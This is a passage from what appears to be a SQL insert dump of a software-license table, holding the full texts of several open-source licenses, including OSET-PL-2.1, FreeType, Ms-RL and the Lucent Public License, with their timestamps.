In addition, after a new version of the Agreement is published,\nContributor may elect to distribute the Program (including its Contributions)\nunder the new version. Except as expressly stated in Sections 2(a) and 2(b)\nabove, Recipient receives no rights or licenses to the intellectual property\nof any Contributor under this Agreement, whether expressly, by implication,\nestoppel or otherwise. All rights in the Program not expressly granted under\nthis Agreement are reserved.\n\nThis Agreement is governed by the laws of the State of New York and the intellectual\nproperty laws of the United States of America. No party to this Agreement\nwill bring a legal action under this Agreement more than one year after the\ncause of action arose. Each party waives its rights to a jury trial in any\nresulting litigation.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(334,'BSD-3-Clause-No-Nuclear-Warranty','Copyright (c) 2003-2005 Sun Microsystems, Inc. All Rights Reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n- Redistribution of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n- Redistribution in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n- Neither the name of Sun Microsystems, Inc. or the names of contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nThis software is provided \"AS IS,\" without a warranty of any kind. ALL EXPRESS\nOR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED\nWARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT,\nARE HEREBY EXCLUDED. SUN MICROSYSTEMS, INC. (\"SUN\") AND ITS LICENSORS SHALL\nNOT BE LIABLE FOR ANY DAMAGES SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING\nOR DISTRIBUTING THIS SOFTWARE OR ITS DERIVATIVES. IN NO EVENT WILL SUN OR\nITS LICENSORS BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT,\nINDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES, HOWEVER\nCAUSED AND REGARDLESS OF THE THEORY OF LIABILITY, ARISING OUT OF THE USE OF\nOR INABILITY TO USE THIS SOFTWARE, EVEN IF SUN HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\nYou acknowledge that this software is not designed or intended for use in\nthe design, construction, operation or maintenance of any nuclear facility.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(335,'OSET-PL-2.1','OSET Public License\n\n(c) 2015 ALL RIGHTS RESERVED VERSION 2.1 THIS LICENSE DEFINES THE RIGHTS OF\nUSE, REPRODUCTION, DISTRIBUTION, MODIFICATION, AND REDISTRIBUTION OF CERTAIN\nCOVERED SOFTWARE (AS DEFINED BELOW) ORIGINALLY RELEASED BY THE OPEN SOURCE\nELECTION TECHNOLOGY FOUNDATION (FORMERLY \"THE OSDV FOUNDATION\").\n\nANYONE WHO USES, REPRODUCES, DISTRIBUTES, MODIFIES, OR REDISTRIBUTES THE COVERED\nSOFTWARE, OR ANY PART THEREOF, IS BY THAT ACTION, ACCEPTING IN FULL THE TERMS\nCONTAINED IN THIS AGREEMENT. IF YOU DO NOT AGREE TO SUCH TERMS, YOU ARE NOT\nPERMITTED TO USE THE COVERED SOFTWARE. This license was prepared based on\nthe Mozilla Public License (\"MPL\"), version 2.0. For annotation of the differences\nbetween this license and MPL 2.0, please see the OSET Foundation web site\nat www.OSETFoundation.org/public-license.\n\nThe text of the license begins here:\n\n 1. Definitions\n\n1.1 \"Contributor\" means each individual or legal entity that creates, contributes\nto the creation of, or owns Covered Software.\n\n1.2 \"Contributor Version\" means the combination of the Contributions of others\n(if any) used by a Contributor and that particular Contributor\'s Contribution.\n\n 1.3 \"Contribution\" means Covered Software of a particular Contributor.\n\n1.4 \"Covered Software\" means Source Code Form to which the initial Contributor\nhas attached the notice in Exhibit A, the Executable Form of such Source Code\nForm, and Modifications of such Source Code Form, in each case including portions\nthereof.\n\n 1.5 \"Incompatible With Secondary Licenses\" means:\n\na. That the initial Contributor has attached the notice described in Exhibit\nB to the Covered Software; or\n\nb. that the Covered Software was made available under the terms of version\n1.x or earlier of the License, but not also under the terms of a Secondary\nLicense.\n\n1.6 \"Executable Form\" means any form of the work other than Source Code Form.\n\n1.7 \"Larger Work\" means a work that combines Covered Software with other material,\nin a separate file (or files) that is not Covered Software.\n\n 1.8 \"License\" means this document.\n\n1.9 \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently, any and all of the\nrights conveyed by this License.\n\n 1.10 \"Modifications\" means any of the following:\n\na. any file in Source Code Form that results from an addition to, deletion\nfrom, or modification of the contents of Covered Software; or\n\nb. any new file in Source Code Form that contains any Covered Software.\n\n1.11 \"Patent Claims\" of a Contributor means any patent claim(s), including\nwithout limitation, method, process, and apparatus claims, in any patent Licensable\nby such Contributor that would be infringed, but for the grant of the License,\nby the making, using, selling, offering for sale, having made, import, or\ntransfer of either its Contributions or its Contributor Version.\n\n1.12 \"Secondary License\" means one of: the GNU General Public License, Version\n2.0, the GNU Lesser General Public License, Version 2.1, the GNU Affero General\nPublic License, Version 3.0, or any later versions of those licenses.\n\n1.13 \"Source Code Form\" means the form of the work preferred for making modifications.\n\n1.14 \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" includes any entity that controls,\nis controlled by, or is under common control with You. For purposes of this\ndefinition, \"control\" means:\n\n(a) the power, direct or indirect, to cause the direction or management of\nsuch entity, whether by contract or otherwise, or\n\n(b) ownership of more than fifty percent (50%) of the outstanding shares or\nbeneficial ownership of such entity.\n\n 2. License Grants and Conditions\n\n 2.1 Grants\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense:\n\na. under intellectual property rights (other than patent or trademark) Licensable\nby such Contributor to use, reproduce, make available, modify, display, perform,\ndistribute, and otherwise exploit its Contributions, either on an unmodified\nbasis, with Modifications, or as part of a Larger Work; and\n\nb. under Patent Claims of such Contributor to make, use, sell, offer for sale,\nhave made, import, and otherwise transfer either its Contributions or its\nContributor Version.\n\n 2.2 Effective Date\n\nThe licenses granted in Section 2.1 with respect to any Contribution become\neffective for each Contribution on the date the Contributor first distributes\nsuch Contribution.\n\n 2.3 Limitations on Grant Scope\n\nThe licenses granted in this Section 2 are the only rights granted under this\nLicense. No additional rights or licenses will be implied from the distribution\nor licensing of Covered Software under this License. Notwithstanding Section\n2.1(b) above, no patent license is granted by a Contributor:\n\na. for any code that a Contributor has removed from Covered Software; or\n\nb. for infringements caused by: (i) Your and any other third party\'s modifications\nof Covered Software, or (ii) the combination of its Contributions with other\nsoftware (except as part of its Contributor Version); or\n\nc. under Patent Claims infringed by Covered Software in the absence of its\nContributions.\n\nThis License does not grant any rights in the trademarks, service marks, or\nlogos of any Contributor (except as may be necessary to comply with the notice\nrequirements in Section 3.4).\n\n 2.4 Subsequent Licenses\n\nNo Contributor makes additional grants as a result of Your choice to distribute\nthe Covered Software under a subsequent version of this License (see Section\n10.2) or under the terms of a Secondary License (if permitted under the terms\nof Section 3.3).\n\n 2.5 Representation\n\nEach Contributor represents that the Contributor believes its Contributions\nare its original creation(s) or it has sufficient rights to grant the rights\nto its Contributions conveyed by this License.\n\n 2.6 Fair Use\n\nThis License is not intended to limit any rights You have under applicable\ncopyright doctrines of fair use, fair dealing, or other equivalents.\n\n 2.7 Conditions\n\nSections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in\nSection 2.1.\n\n 3. Responsibilities\n\n 3.1 Distribution of Source Form\n\nAll distribution of Covered Software in Source Code Form, including any Modifications\nthat You create or to which You contribute, must be under the terms of this\nLicense. You must inform recipients that the Source Code Form of the Covered\nSoftware is governed by the terms of this License, and how they can obtain\na copy of this License. You must cause any of Your Modifications to carry\nprominent notices stating that You changed the files. You may not attempt\nto alter or restrict the recipients\' rights in the Source Code Form.\n\n 3.2 Distribution of Executable Form\n\n If You distribute Covered Software in Executable Form then:\n\na. such Covered Software must also be made available in Source Code Form,\nas described in Section 3.1, and You must inform recipients of the Executable\nForm how they can obtain a copy of such Source Code Form by reasonable means\nin a timely manner, at a charge no more than the cost of distribution to the\nrecipient; and\n\nb. You may distribute such Executable Form under the terms of this License,\nor sublicense it under different terms, provided that the license for the\nExecutable Form does not attempt to limit or alter the recipients\' rights\nin the Source Code Form under this License.\n\n 3.3 Distribution of a Larger Work\n\nYou may create and distribute a Larger Work under terms of Your choice, provided\nthat You also comply with the requirements of this License for the Covered\nSoftware. If the Larger Work is a combination of Covered Software with a work\ngoverned by one or more Secondary Licenses, and the Covered Software is not\nIncompatible With Secondary Licenses, this License permits You to additionally\ndistribute such Covered Software under the terms of such Secondary License(s),\nso that the recipient of the Larger Work may, at their option, further distribute\nthe Covered Software under the terms of either this License or such Secondary\nLicense(s).\n\n 3.4 Notices\n\nYou may not remove or alter the substance of any license notices (including\ncopyright notices, patent notices, disclaimers of warranty, or limitations\nof liability) contained within the Source Code Form of the Covered Software,\nexcept that You may alter any license notices to the extent required to remedy\nknown factual inaccuracies.\n\n 3.5 Application of Additional Terms\n\n3.5.1 You may choose to offer, and to charge a fee for, warranty, support,\nindemnity or liability obligations to one or more recipients of Covered Software.\nHowever, You may do so only on Your own behalf, and not on behalf of any Contributor.\nYou must make it absolutely clear that any such warranty, support, indemnity,\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nevery Contributor for any liability incurred by such Contributor as a result\nof warranty, support, indemnity or liability terms You offer. You may include\nadditional disclaimers of warranty and limitations of liability specific to\nany jurisdiction.\n\n3.5.2 You may place additional conditions upon the rights granted in this\nLicense to the extent necessary due to statute, judicial order, regulation\n(including without limitation state and federal procurement regulation), national\nsecurity, or public interest. Any such additional conditions must be clearly\ndescribed in the notice provisions required under Section 3.4. Any alteration\nof the terms of this License will apply to all copies of the Covered Software\ndistributed by You or by any downstream recipients that receive the Covered\nSoftware from You.\n\n 4. Inability to Comply Due to Statute or Regulation\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Software due to statute, judicial\norder, or regulation, then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the notices required under\nSection 3.4. Except to the extent prohibited by statute or regulation, such\ndescription must be sufficiently detailed for a recipient of ordinary skill\nto be able to understand it.\n\n 5. Termination\n\n 5.1 Failure to Comply\n\nThe rights granted under this License will terminate automatically if You\nfail to comply with any of its terms. However, if You become compliant, then\nthe rights granted under this License from a particular Contributor are reinstated\n(a) provisionally, unless and until such Contributor explicitly and finally\nterminates Your grants, and (b) on an ongoing basis, if such Contributor fails\nto notify You of the non-compliance by some reasonable means prior to 60-days\nafter You have come back into compliance. Moreover, Your grants from a particular\nContributor are reinstated on an ongoing basis if such Contributor notifies\nYou of the non-compliance by some reasonable means, this is the first time\nYou have received notice of non-compliance with this License from such Contributor,\nand You become compliant prior to 30-days after Your receipt of the notice.\n\n 5.2 Patent Infringement Claims\n\nIf You initiate litigation against any entity by asserting a patent infringement\nclaim (excluding declaratory judgment actions, counter-claims, and cross-claims\n) alleging that a Contributor Version directly or indirectly infringes any\npatent, then the rights granted to You by any and all Contributors for the\nCovered Software under Section 2.1 of this License shall terminate.\n\n 5.3 Additional Compliance Terms\n\nNotwithstanding the foregoing in this Section 5, for purposes of this Section,\nif You breach Section 3.1 (Distribution of Source Form), Section 3.2 (Distribution\nof Executable Form), Section 3.3 (Distribution of a Larger Work), or Section\n3.4 (Notices), then becoming compliant as described in Section 5.1 must also\ninclude, no later than 30 days after receipt by You of notice of such violation\nby a Contributor, making the Covered Software available in Source Code Form\nas required by this License on a publicly available computer network for a\nperiod of no less than three (3) years.\n\n 5.4 Contributor Remedies\n\nIf You fail to comply with the terms of this License and do not thereafter\nbecome compliant in accordance with Section 5.1 and, if applicable, Section\n5.3, then each Contributor reserves its right, in addition to any other rights\nit may have in law or in equity, to bring an action seeking injunctive relief,\nor damages for willful copyright or patent infringement (including without\nlimitation damages for unjust enrichment, where available under law), for\nall actions in violation of rights that would otherwise have been granted\nunder the terms of this License.\n\n 5.5 End User License Agreements\n\nIn the event of termination under this Section 5, all end user license agreements\n(excluding distributors and resellers), which have been validly granted by\nYou or Your distributors under this License prior to termination shall survive\ntermination.\n\n 6. Disclaimer of Warranty\n\nCovered Software is provided under this License on an \"as is\" basis, without\nwarranty of any kind, either expressed, implied, or statutory, including,\nwithout limitation, warranties that the Covered Software is free of defects,\nmerchantable, fit for a particular purpose or non-infringing. The entire risk\nas to the quality and performance of the Covered Software is with You. Should\nany Covered Software prove defective in any respect, You (not any Contributor)\nassume the cost of any necessary servicing, repair, or correction. This disclaimer\nof warranty constitutes an essential part of this License. No use of any Covered\nSoftware is authorized under this License except under this disclaimer.\n\n 7. Limitation of Liability\n\nUnder no circumstances and under no legal theory, whether tort (including\nnegligence), contract, or otherwise, shall any Contributor, or anyone who\ndistributes Covered Software as permitted above, be liable to You for any\ndirect, indirect, special, incidental, or consequential damages of any character\nincluding, without limitation, damages for lost profits, loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses, even if such party shall have been informed of the possibility\nof such damages. This limitation of liability shall not apply to liability\nfor death or personal injury resulting from such party\'s negligence to the\nextent applicable law prohibits such limitation. Some jurisdictions do not\nallow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n 8. Litigation\n\nAny litigation relating to this License may be brought only in the courts\nof a jurisdiction where the defendant maintains its principal place of business\nand such litigation shall be governed by laws of that jurisdiction, without\nreference to its conflict-of-law provisions. Nothing in this Section shall\nprevent a party\'s ability to bring cross-claims or counter-claims.\n\n 9. Government Terms\n\n 9.1 Commercial Item\n\nThe Covered Software is a \"commercial item,\" as that term is defined in 48\nC.F.R. 2.101 (Oct. 1995), consisting of \"commercial computer software\" and\n\"commercial computer software documentation,\" as such terms are used in 48\nC.F.R. 12.212 (Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R.\n227.7202-1 through 227.7202-4 (June 1995), all U.S. Government End Users acquire\nCovered Software with only those rights set forth herein.\n\n 9.2 No Sovereign Immunity\n\nThe U.S. federal government and states that use or distribute Covered Software\nhereby waive their sovereign immunity with respect to enforcement of the provisions\nof this License.\n\n 9.3 Choice of Law and Venue\n\n9.3.1 If You are a government of a state of the United States, or Your use\nof the Covered Software is pursuant to a procurement contract with such a\nstate government, this License shall be governed by the law of such state,\nexcluding its conflict-of-law provisions, and the adjudication of disputes\nrelating to this License will be subject to the exclusive jurisdiction of\nthe state and federal courts located in such state.\n\n9.3.2 If You are an agency of the United States federal government, or Your\nuse of the Covered Software is pursuant to a procurement contract with such\nan agency, this License shall be governed by federal law for all purposes,\nand the adjudication of disputes relating to this License will be subject\nto the exclusive jurisdiction of the federal courts located in Washington,\nD.C.\n\n9.3.3 You may alter the terms of this Section 9.3 for this License as described\nin Section 3.5.2.\n\n 9.4 Supremacy\n\nThis Section 9 is in lieu of, and supersedes, any other Federal Acquisition\nRegulation, Defense Federal Acquisition Regulation, or other clause or provision\nthat addresses government rights in computer software under this License.\n\n 10. Miscellaneous\n\nThis License represents the complete agreement concerning the subject matter\nhereof. If any provision of this License is held to be unenforceable, such\nprovision shall be reformed only to the extent necessary to make it enforceable.\nAny law or regulation, which provides that the language of a contract shall\nbe construed against the drafter, shall not be used to construe this License\nagainst a Contributor.\n\n 11. Versions of the License\n\n 11.1 New Versions\n\nThe Open Source Election Technology Foundation (\"OSET\") (formerly known as\nthe Open Source Digital Voting Foundation) is the steward of this License.\nExcept as provided in Section 11.3, no one other than the license steward\nhas the right to modify or publish new versions of this License. Each version\nwill be given a distinguishing version number.\n\n 11.2 Effects of New Versions\n\nYou may distribute the Covered Software under the terms of the version of\nthe License under which You originally received the Covered Software, or under\nthe terms of any subsequent version published by the license steward.\n\n 11.3 Modified Versions\n\nIf You create software not governed by this License, and You want to create\na new license for such software, You may create and use a modified version\nof this License if You rename the license and remove any references to the\nname of the license steward (except to note that such modified license differs\nfrom this License).\n\n11.4 Distributing Source Code Form That is Incompatible With Secondary Licenses\n\nIf You choose to distribute Source Code Form that is Incompatible With Secondary\nLicenses under the terms of this version of the License, the notice described\nin Exhibit B of this License must be attached. EXHIBIT A - Source Code Form\nLicense Notice\n\nThis Source Code Form is subject to the terms of the OSET Public License,\nv.2.1 (\"OPL\"). If a copy of the OPL was not distributed with this file, You\ncan obtain one at: www.OSETFoundation.org/public-license.\n\nIf it is not possible or desirable to put the Notice in a particular file,\nthen You may include the Notice in a location (e.g., such as a LICENSE file\nin a relevant directory) where a recipient would be likely to look for such\na notice. You may add additional accurate notices of copyright ownership.\nEXHIBIT B - \"Incompatible With Secondary License\" Notice\n\nThis Source Code Form is \"Incompatible With Secondary Licenses\", as defined\nby the OSET Public License, v.2.1.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(336,'gnuplot','Copyright 1986 - 1993, 1998, 2004 Thomas Williams, Colin Kelley\n\nPermission to use, copy, and distribute this software and its documentation\nfor any purpose with or without fee is hereby granted, provided that the above\ncopyright notice appear in all copies and that both that copyright notice\nand this permission notice appear in supporting documentation.\n\nPermission to modify the software is granted, but not the right to distribute\nthe complete modified source code. Modifications are to be distributed as\npatches to the released version. Permission to distribute binaries produced\nby compiling modified sources is granted, provided you\n\n1. distribute the corresponding source modifications from the released version\nin the form of a patch file along with the binaries,\n\n2. add special version identification to distinguish your version in addition\nto the base release version number,\n\n3. provide your name and address as the primary contact for the support of\nyour modified version, and\n\n 4. retain our contact information in regard to use of the base software.\n\nPermission to distribute the released version of the source code along with\ncorresponding source modifications in the form of a patch file is granted\nwith same provisions 2 through 4 for binary distributions.\n\nThis software is provided \"as is\" without express or implied warranty to the\nextent permitted by applicable law.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(337,'EFL-2.0','Eiffel Forum License, version 2\n\n1. Permission is hereby granted to use, copy, modify and/or distribute this\npackage, provided that:\n\n - copyright notices are retained unchanged,\n\n- any distribution of this package, whether modified or not, includes this\nlicense text.\n\n2. Permission is hereby also granted to distribute binary programs which depend\non this package. If the binary program depends on a modified version of this\npackage, you are encouraged to publicly release the modified version of this\npackage.\n\nTHIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY. ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nAUTHORS BE LIABLE TO ANY PARTY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THIS\nPACKAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(338,'FTL','The FreeType Project LICENSE\n\n2006-Jan-27 Copyright 1996-2002, 2006 by David Turner, Robert Wilhelm, and\nWerner Lemberg\n\nIntroduction\n\nThe FreeType Project is distributed in several archive packages; some of them\nmay contain, in addition to the FreeType font engine, various tools and contributions\nwhich rely on, or relate to, the FreeType Project.\n\nThis license applies to all files found in such packages, and which do not\nfall under their own explicit license. The license affects thus the FreeType\nfont engine, the test programs, documentation and makefiles, at the very least.\n\nThis license was inspired by the BSD, Artistic, and IJG (Independent JPEG\nGroup) licenses, which all encourage inclusion and use of free software in\ncommercial and freeware products alike. As a consequence, its main points\nare that:\n\no We don\'t promise that this software works. However, we will be interested\nin any kind of bug reports. (`as is\' distribution)\n\no You can use this software for whatever you want, in parts or full form,\nwithout having to pay us. (`royalty-free\' usage)\n\no You may not pretend that you wrote this software. If you use it, or only\nparts of it, in a program, you must acknowledge somewhere in your documentation\nthat you have used the FreeType code. (`credits\')\n\nWe specifically permit and encourage the inclusion of this software, with\nor without modifications, in commercial products. We disclaim all warranties\ncovering The FreeType Project and assume no liability related to The FreeType\nProject.\n\nFinally, many people asked us for a preferred form for a credit/disclaimer\nto use in compliance with this license. We thus encourage you to use the following\ntext:\n\n\"\"\" Portions of this software are copyright © <year> The FreeType Project\n(www.freetype.org). All rights reserved. \"\"\"\n\nPlease replace <year> with the value from the FreeType version you actually\nuse.\n\nLegal Terms\n\n 0. Definitions\n\nThroughout this license, the terms `package\', `FreeType Project\', and `FreeType\narchive\' refer to the set of files originally distributed by the authors (David\nTurner, Robert Wilhelm, and Werner Lemberg) as the `FreeType Project\', be\nthey named as alpha, beta or final release.\n\n`You\' refers to the licensee, or person using the project, where `using\' is\na generic term including compiling the project\'s source code as well as linking\nit to form a `program\' or `executable\'. This program is referred to as `a\nprogram using the FreeType engine\'.\n\nThis license applies to all files distributed in the original FreeType Project,\nincluding all source code, binaries and documentation, unless otherwise stated\nin the file in its original, unmodified form as distributed in the original\narchive. If you are unsure whether or not a particular file is covered by\nthis license, you must contact us to verify this.\n\nThe FreeType Project is copyright (C) 1996-2000 by David Turner, Robert Wilhelm,\nand Werner Lemberg. All rights reserved except as specified below.\n\n 1. No Warranty\n\nTHE FREETYPE PROJECT IS PROVIDED `AS IS\' WITHOUT WARRANTY OF ANY KIND, EITHER\nEXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT WILL ANY OF THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY DAMAGES CAUSED BY THE USE OR THE INABILITY\nTO USE, OF THE FREETYPE PROJECT.\n\n 2. Redistribution\n\nThis license grants a worldwide, royalty-free, perpetual and irrevocable right\nand license to use, execute, perform, compile, display, copy, create derivative\nworks of, distribute and sublicense the FreeType Project (in both source and\nobject code forms) and derivative works thereof for any purpose; and to authorize\nothers to exercise some or all of the rights granted herein, subject to the\nfollowing conditions:\n\no Redistribution of source code must retain this license file (`FTL.TXT\')\nunaltered; any additions, deletions or changes to the original files must\nbe clearly indicated in accompanying documentation. The copyright notices\nof the unaltered, original files must be preserved in all copies of source\nfiles.\n\no Redistribution in binary form must provide a disclaimer that states that\nthe software is based in part of the work of the FreeType Team, in the distribution\ndocumentation. We also encourage you to put an URL to the FreeType web page\nin your documentation, though this isn\'t mandatory.\n\nThese conditions apply to any software derived from or based on the FreeType\nProject, not just the unmodified files. If you use our work, you must acknowledge\nus. However, no fee need be paid to us.\n\n 3. Advertising\n\nNeither the FreeType authors and contributors nor you shall use the name of\nthe other for commercial, advertising, or promotional purposes without specific\nprior written permission.\n\nWe suggest, but do not require, that you use one or more of the following\nphrases to refer to this software in your documentation or advertising materials:\n`FreeType Project\', `FreeType Engine\', `FreeType library\', or `FreeType Distribution\'.\n\nAs you have not signed this license, you are not required to accept it. However,\nas the FreeType Project is copyrighted material, only this license, or another\none contracted with the authors, grants you the right to use, distribute,\nand modify it. Therefore, by using, distributing, or modifying the FreeType\nProject, you indicate that you understand and accept all the terms of this\nlicense.\n\n 4. Contacts\n\n There are two mailing lists related to FreeType:\n\n o freetype@nongnu.org\n\nDiscusses general use and applications of FreeType, as well as future and\nwanted additions to the library and distribution. If you are looking for support,\nstart in this list if you haven\'t found anything to help you in the documentation.\n\n o freetype-devel@nongnu.org\n\nDiscusses bugs, as well as engine internals, design issues, specific licenses,\nporting, etc.\n\n Our home page can be found at\n\n http://www.freetype.org --- end of FTL.TXT ---\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(339,'MS-RL','Microsoft Reciprocal License (Ms-RL)\n\nThis license governs use of the accompanying software. If you use the software,\nyou accept this license. If you do not accept the license, do not use the\nsoftware.\n\n 1. Definitions\n\nThe terms \"reproduce,\" \"reproduction,\" \"derivative works,\" and \"distribution\"\nhave the same meaning here as under U.S. copyright law.\n\nA \"contribution\" is the original software, or any additions or changes to\nthe software.\n\nA \"contributor\" is any person that distributes its contribution under this\nlicense.\n\n\"Licensed patents\" are a contributor\'s patent claims that read directly on\nits contribution.\n\n 2. Grant of Rights\n\n(A) Copyright Grant- Subject to the terms of this license, including the license\nconditions and limitations in section 3, each contributor grants you a non-exclusive,\nworldwide, royalty-free copyright license to reproduce its contribution, prepare\nderivative works of its contribution, and distribute its contribution or any\nderivative works that you create.\n\n(B) Patent Grant- Subject to the terms of this license, including the license\nconditions and limitations in section 3, each contributor grants you a non-exclusive,\nworldwide, royalty-free license under its licensed patents to make, have made,\nuse, sell, offer for sale, import, and/or otherwise dispose of its contribution\nin the software or derivative works of the contribution in the software.\n\n 3. Conditions and Limitations\n\n(A) Reciprocal Grants- For any file you distribute that contains code from\nthe software (in source code or binary format), you must provide recipients\nthe source code to that file along with a copy of this license, which license\nwill govern that file. You may license other files that are entirely your\nown work and do not contain code from the software under any terms you choose.\n\n(B) No Trademark License- This license does not grant you rights to use any\ncontributors\' name, logo, or trademarks.\n\n(C) If you bring a patent claim against any contributor over patents that\nyou claim are infringed by the software, your patent license from such contributor\nto the software ends automatically.\n\n(D) If you distribute any portion of the software, you must retain all copyright,\npatent, trademark, and attribution notices that are present in the software.\n\n(E) If you distribute any portion of the software in source code form, you\nmay do so only under this license by including a complete copy of this license\nwith your distribution. If you distribute any portion of the software in compiled\nor object code form, you may only do so under a license that complies with\nthis license.\n\n(F) The software is licensed \"as-is.\" You bear the risk of using it. The contributors\ngive no express warranties, guarantees, or conditions. You may have additional\nconsumer rights under your local laws which this license cannot change. To\nthe extent permitted under your local laws, the contributors exclude the implied\nwarranties of merchantability, fitness for a particular purpose and non-infringement.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(340,'LPL-1.02','Lucent Public License Version 1.02\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS PUBLIC LICENSE\n(\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES\nRECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT.\n\n 1. DEFINITIONS\n\n \"Contribution\" means:\n\na. in the case of Lucent Technologies Inc. (\"LUCENT\"), the Original Program,\nand\n\n b. in the case of each Contributor,\n\n i. changes to the Program, and\n\n ii. additions to the Program;\n\nwhere such changes and/or additions to the Program were added to the Program\nby such Contributor itself or anyone acting on such Contributor\'s behalf,\nand the Contributor explicitly consents, in accordance with Section 3C, to\ncharacterization of the changes and/or additions as Contributions.\n\n\"Contributor\" means LUCENT and any other entity that has Contributed a Contribution\nto the Program.\n\n\"Distributor\" means a Recipient that distributes the Program, modifications\nto the Program, or any part thereof.\n\n\"Licensed Patents\" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Original Program\" means the original version of the software accompanying\nthis Agreement as released by LUCENT, including source code, object code and\ndocumentation, if any.\n\n\"Program\" means the Original Program and Contributions or any part thereof\n\n\"Recipient\" means anyone who receives the Program under this Agreement, including\nall Contributors.\n\n 2. GRANT OF RIGHTS\n\na. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form.\n\nb. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in source code and object code form.\nThe patent license granted by a Contributor shall also apply to the combination\nof the Contribution of that Contributor and the Program if, at the time the\nContribution is added by the Contributor, such addition of the Contribution\ncauses such combination to be covered by the Licensed Patents. The patent\nlicense granted by a Contributor shall not apply to (i) any other combinations\nwhich include the Contribution, nor to (ii) Contributions of other Contributors.\nNo hardware per se is licensed hereunder.\n\nc. Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, no assurances are provided by any Contributor\nthat the Program does not infringe the patent or other intellectual property\nrights of any other entity. Each Contributor disclaims any liability to Recipient\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, each Recipient hereby assumes sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow Recipient to distribute\nthe Program, it is Recipient\'s responsibility to acquire that license before\ndistributing the Program.\n\nd. Each Contributor represents that to its knowledge it has sufficient copyright\nrights in its Contribution, if any, to grant the copyright license set forth\nin this Agreement.\n\n 3. REQUIREMENTS\n\nA. Distributor may choose to distribute the Program in any form under this\nAgreement or under its own license agreement, provided that:\n\n 1. it complies with the terms and conditions of this Agreement;\n\n2. if the Program is distributed in source code or other tangible form, a\ncopy of this Agreement or Distributor\'s own license agreement is included\nwith each copy of the Program; and\n\n3. if distributed under Distributor\'s own license agreement, such license\nagreement:\n\na. effectively disclaims on behalf of all Contributors all warranties and\nconditions, express and implied, including warranties or conditions of title\nand non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nb. effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits; and\n\nc. states that any provisions which differ from this Agreement are offered\nby that Contributor alone and not by any other party.\n\nB. Each Distributor must include the following in a conspicuous location in\nthe Program:\n\nCopyright (C) 2003, Lucent Technologies Inc. and others. All Rights Reserved.\n\nC. In addition, each Contributor must identify itself as the originator of\nits Contribution in a manner that reasonably allows subsequent Recipients\nto identify the originator of the Contribution. Also, each Contributor must\nagree that the additions and/or changes are intended to be a Contribution.\nOnce a Contribution is contributed, it may not thereafter be revoked.\n\n 4. COMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Distributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for Contributors. Therefore,\nif a Distributor includes the Program in a 